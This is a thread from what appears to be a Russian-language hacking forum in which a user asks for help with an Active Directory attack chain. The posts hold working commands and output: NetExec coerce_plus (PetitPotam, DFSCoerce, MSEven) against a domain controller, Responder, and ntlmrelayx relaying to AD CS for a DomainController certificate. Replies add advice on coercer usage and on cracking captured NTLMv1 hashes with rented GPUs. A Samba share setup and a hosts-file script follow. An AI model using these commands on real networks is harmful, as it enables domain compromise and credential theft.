• XSS.stack #1 – первый литературный журнал от юзеров форума

NetExec Module : coerce_plus

Sec13B

(L3) cache
Пользователь
Регистрация
05.01.2023
Сообщения
257
Реакции
39
Kali IP:
eth0: 10.168.10.140

Connection Vpn (cisco, forti, softether , no matter)
route -4
192.168.150.0/24

Код:
poetry run netexec smb 192.168.150.0/24 -u test -p 'pornostar' -M coerce_plus


Код:
COERCE_PLUS 192.168.150.16  445    DC02             VULNERABLE, DFSCoerce
COERCE_PLUS 192.168.150.16  445    DC02             VULNERABLE, PetitPotam
COERCE_PLUS 192.168.150.16  445    DC02             VULNERABLE, MSEven


Код:
poetry run netexec smb 192.168.150.0/24-u test -p 'pornostar' -M coerce_plus

the netexec e2e_commands full: e2e_commands

I will use " -M coerce_plus -o LISTENER=10.168.10.140"

Kali IP:10.168.10.140

192.168.150.16 DC02.gangbang.local

Код:
poetry run netexec smb 192.168.150.16 -u test -p 'pornostar' -M coerce_plus -o LISTENER=10.168.10.140

COERCE_PLUS 192.168.150.16  445    DC02             VULNERABLE, DFSCoerce
COERCE_PLUS 192.168.150.16  445    DC02             Exploit Success, netdfs\NetrDfsRemoveRootTarget
COERCE_PLUS 192.168.150.16  445    DC02             Exploit Success, netdfs\NetrDfsAddStdRoot
COERCE_PLUS 192.168.150.16  445    DC02             Exploit Success, netdfs\NetrDfsRemoveStdRoot
COERCE_PLUS 192.168.150.16  445    DC02             VULNERABLE, PetitPotam
COERCE_PLUS 192.168.150.16  445    DC02             Exploit Success, efsrpc\EfsRpcAddUsersToFile
COERCE_PLUS 192.168.150.16  445    DC02             VULNERABLE, MSEven


Код:
sudo responder -I eth0

Код:
impacket-ntlmrelayx -6 -ts -t http://DC02.gangbang.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController


I ddint receive any connections information

Any Help is welcome
 
Последнее редактирование:
Насколько мне известно,релей атаки можно делать при signing:False,ты же пытаешься пробить DC,там всего signing:true.Еще может быть причина в твоем ip,нужен такой же route как и у тачки на которую планируешь его применить.
 
Насколько мне известно,релей атаки можно делать при signing:False,ты же пытаешься пробить DC,там всего signing:true.Еще может быть причина в твоем ip,нужен такой же route как и у тачки на которую планируешь его применить.
can you give more information or example ?

i also try separately proxychains with certipy and proxychains coerce , and nothing .
 
can you give more information or example ?

i also try separately proxychains with certipy and proxychains coerce , and nothing .
Нет,не смогу,только рассказывали и бывало сам читал про это.На деле никогда не применял,replay атаки худшие по моему мнению.Лучше в шарах пассы поищи.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
sudo python3 Responder.py -I eth0 --lm



Посмотреть вложение 97890
Респондер должен быть в той же подсети или внешкой, про signing первый раз слышу, больше роляет то юзает комп smbv1 либо smbv2, при первой версии протокола мы ловим хеш который через хешкат и сервис который даёт нам гпу мощности ломаем за сутки(не помню точно), а если вторая версия протокола зря тратишь время, расшифровать пароль скажем проще "Компа" из AD при словленом NTLMv2 ну нереально почти из моих знаний, такое проканает только на компах где первая версия протокола.
Ах и да, дам совет, юзай лучше coercer
Bash:
apt install coercer
потом уже юзай его так : coercer coerce -u user -p pass -d domain.local -t taget -l listener(responder) {в конце можно ещё --always-continue влепить удобства ради}
 
─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

10.168.10.140 kali.gangbang.local

Script i use to/for simplify
Код:
#!/usr/bin/bash
#$hostname
#$hostnamectl
#$hostnamectl set-hostname lvapt-kali.example.local
#sudo bash hosts.sh 10.168.10.140 kali example.local
#defining the hostname
ip=$1
machineName=$2
domain=$3
#check if the IP has been used before. 
if grep "$1" /etc/hosts ; then
 echo "*********************************************************"
 echo "The IP is in use with a hostname already!"
 echo "Here is what your hosts file looks like:"
 echo "*********************************************************"
 cat /etc/hosts
 echo "*********************************************************"
 echo "If you want to continue, make the manual edit on the file hosts file with 'sudo nano /etc/hosts'"
 echo "*********************************************************"
else
#Since the IP is not in the hosts file, we will now add it
 sudo bash -c "echo '$1 $2.$3' >> /etc/hosts"
#check if the /etc/hosts file was successfully edited to include your machine name and IP. 
 if grep "$2" /etc/hosts ; then
  echo "You can reach your machine on $2.$3 now!"
 else
  echo "Something went wrong :( "
 fi
fi
 
Респондер должен быть в той же подсети или внешкой, про signing первый раз слышу, больше роляет то юзает комп smbv1 либо smbv2, при первой версии протокола мы ловим хеш который через хешкат и сервис который даёт нам гпу мощности ломаем за сутки(не помню точно), а если вторая версия протокола зря тратишь время, расшифровать пароль скажем проще "Компа" из AD при словленом NTLMv2 ну нереально почти из моих знаний, такое проканает только на компах где первая версия протокола.
Ах и да, дам совет, юзай лучше coercer
Bash:
apt install coercer
потом уже юзай его так : coercer coerce -u user -p pass -d domain.local -t taget -l listener(responder) {в конце можно ещё --always-continue влепить удобства ради}




setup samba​

sudo apt install samba
sudo mv /etc/samba/smb.conf /etc/samba/smb.conf.old
sudo nano /etc/samba/smb.conf

[visualstudio]
path = /home/kali/data
browseable = yes
read only = no

sudo smbpasswd -a kali

sudo systemctl start smbd
sudo systemctl start nmbd

mkdir /home/kali/data
chmod -R 777 /home/kali/data





1730527907967.png
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх